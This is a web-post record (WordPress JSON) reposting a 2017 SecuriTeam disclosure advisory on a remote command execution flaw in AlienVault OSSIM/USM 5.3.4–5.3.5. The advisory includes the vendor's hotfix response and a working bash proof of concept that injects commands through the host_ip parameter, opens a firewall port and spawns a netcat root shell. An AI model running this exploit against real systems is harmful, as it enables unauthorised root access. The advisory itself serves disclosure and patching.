{"id":7218,"date":"2017-04-03T14:19:11","date_gmt":"2017-04-03T22:19:11","guid":{"rendered":"http:\/\/www.palada.net\/index.php\/2017\/04\/03\/news-1009\/"},"modified":"2017-04-03T14:19:11","modified_gmt":"2017-04-03T22:19:11","slug":"news-1009","status":"publish","type":"post","link":"http:\/\/www.palada.net\/index.php\/2017\/04\/03\/news-1009\/","title":{"rendered":"SSD Advisory \u2013 AlienVault OSSIM \/ USM Remote Command Execution"},"content":{"rendered":"<p><strong>Credit to Author: Maor Schwartz| Date: Mon, 03 Apr 2017 07:29:37 +0000<\/strong><\/p>\n<div class=\"entry-content\">\n<p><strong>Want to get paid for a vulnerability similar to this one?<\/strong><br \/>Contact us at: <a href=\"mailto:sxsxd@bxexyxoxnxdxsxexcxuxrxixtxy.com\" onmouseover=\"this.href=this.href.replace(\/x\/g,'');\" id=\"a-href-3085\">sxsxdx@xbxexyxoxnxdxsxexcxuxrxixtxy.xcom<\/a><\/p>\n<p><script>var obj = jQuery('#a-href-3085');if(obj[0]) { obj[0].innerText = obj[0].innerText.replace(\/x\/g, ''); }<\/script>  \t\t<\/p>\n<p><strong>Vulnerability Summary<\/strong><br \/> The following advisory describes a Remote Command Execution vulnerability found in AlientVault OSSIM and USM version 5.3.4 and version 5.3.5.<\/p>\n<p>OSSIM, AlienVault&#8217;s Open Source Security Information and Event Management (SIEM) product, provides you with a feature-rich open source SIEM complete with event collection, normalization and correlation. Launched by security engineers because of the lack of available open source products, OSSIM was created specifically to address the reality many security professionals face: A SIEM, whether it is open source or commercial, is virtually useless without the basic security controls necessary for security visibility.<\/p>\n<p>AlienVault Unified Security Management (USM) is a comprehensive approach to security monitoring, delivered in a unified platform. The USM platform includes five essential security capabilities that provide resource-constrained organizations with all the security essentials needed for effective threat detection, incident response, and compliance, in a single pane of glass.<\/p>\n<p>Designed to monitor cloud, hybrid cloud and on-premises environments, AlienVault USM significantly reduces complexity and deployment time so that you can go from installation to first insight in minutes \u2013 talk about fast threat detection!<\/p>\n<p><strong>Credit<\/strong><br \/> An independent security researcher has reported this vulnerability to Beyond Security\u2019s SecuriTeam Secure Disclosure program<\/p>\n<p><strong>Vendor Responses<\/strong><br \/> &#8220;We have confirmed that this issue impacts v5.3.4 and v5.3.5 of OSSIM and USM. As a result, we will be pushing a hotfix release (v5.3.6) to all users which will patch this vulnerability&#8221; for more details you can see the release notes released here: <a href=\"https:\/\/www.alienvault.com\/forums\/discussion\/8415\/alienvault-v5-3-6-hotfix-important-update\" target=\"_blank\">https:\/\/www.alienvault.com\/forums\/discussion\/8415\/alienvault-v5-3-6-hotfix-important-update<\/a><\/p>\n<p><span id=\"more-3085\"><\/span><\/p>\n<p><strong>Vulnerability Details<\/strong><br \/> The vulnerability can be found in the default installation without any plugins. The function <em>get_fqdn<\/em> don&#8217;t validate user input.<\/p>\n<p>The function <em>get_fqdn<\/em> execute nslookup (executable=\/bin\/bash nslookup) with parameter (<em>%s<\/em>), when <em>%s<\/em> is the <em>host_ip<\/em> in the control of user. A user can concatenate commands to run by adding &#8220;<em>;<\/em>&#8221; to the &#8220;<em>host_ip<\/em>&#8221; parameter.<\/p>\n<p><strong>Proof Of Concept:<\/strong><\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-58e2ca5e197cf841383342\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> #!\/bin\/bash    usage() {  echo &#8220;Usage: $0 &lt;ip&gt;&#8221;  }    info() {  echo &#8220;[+] $1&#8221;  }    if [ -z &#8220;$1&#8243; ]; then  usage &gt;&amp;1  exit 1  fi    IP=&#8221;$1&#8221;  PORT=8888    nohup curl -ks -XPOST -d   &#8216;host_ip=127.0.0.1;  iptables-save &gt; \/tmp\/.rules;  iptables -I INPUT -p tcp &#8211;dport &#8216;$PORT&#8217; -j ACCEPT;  mkfifo \/tmp\/ncshell;  sh \/tmp\/ncshell | nc -l -p &#8216;$PORT&#8217; &gt; \/tmp\/ncshell;  rm -f \/tmp\/ncshell;  iptables-restore &lt; \/tmp\/.rules;  rm -f \/tmp\/.rules&#8217;   &#8220;https:\/\/$IP:40011\/av\/api\/1.0\/system\/local\/network\/fqdn&#8221; &gt;\/dev\/null 2&gt;&amp;1 &amp;    info &#8220;Exploit running&#8230;&#8221;  sleep 2  info &#8216;Now you should have your root shell: (^D to exit)&#8217;    rc=0  nc $IP $PORT  info &#8216;Terminated'&lt;\/ip&gt;<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">  \t\t\t\t  \t\t\t<\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0045 seconds] -->  <\/p>\n<\/p><\/div>\n<p><a href=\"https:\/\/blogs.securiteam.com\/index.php\/archives\/3085\" target=\"bwo\" >https:\/\/blogs.securiteam.com\/index.php\/feed<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p><strong>Credit to Author: Maor Schwartz| Date: Mon, 03 Apr 2017 07:29:37 +0000<\/strong><\/p>\n<p>Vulnerability Summary The following advisory describes a Remote Command Execution vulnerability found in AlientVault OSSIM and USM version 5.3.4 and version 5.3.5. OSSIM, AlienVault&#8217;s Open Source Security Information and Event Management (SIEM) product, provides you with a feature-rich open source SIEM complete with event collection, normalization and correlation. Launched by security engineers because of the &#8230; <a href=\"https:\/\/blogs.securiteam.com\/index.php\/archives\/3085\" class=\"more-link\">Continue reading <span class=\"screen-reader-text\">SSD Advisory \u2013 AlienVault OSSIM \/ USM Remote Command Execution<\/span><\/a><\/p>\n","protected":false},"author":4,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"colormag_page_container_layout":"default_layout","colormag_page_sidebar_layout":"default_layout","footnotes":""},"categories":[10643,10754],"tags":[11851,10757],"class_list":["post-7218","post","type-post","status-publish","format-standard","hentry","category-independent","category-securiteam","tag-remote-command-execution","tag-securiteam-secure-disclosure"],"_links":{"self":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/7218","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/comments?post=7218"}],"version-history":[{"count":0,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/7218\/revisions"}],"wp:attachment":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/media?parent=7218"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/categories?post=7218"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/tags?post=7218"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}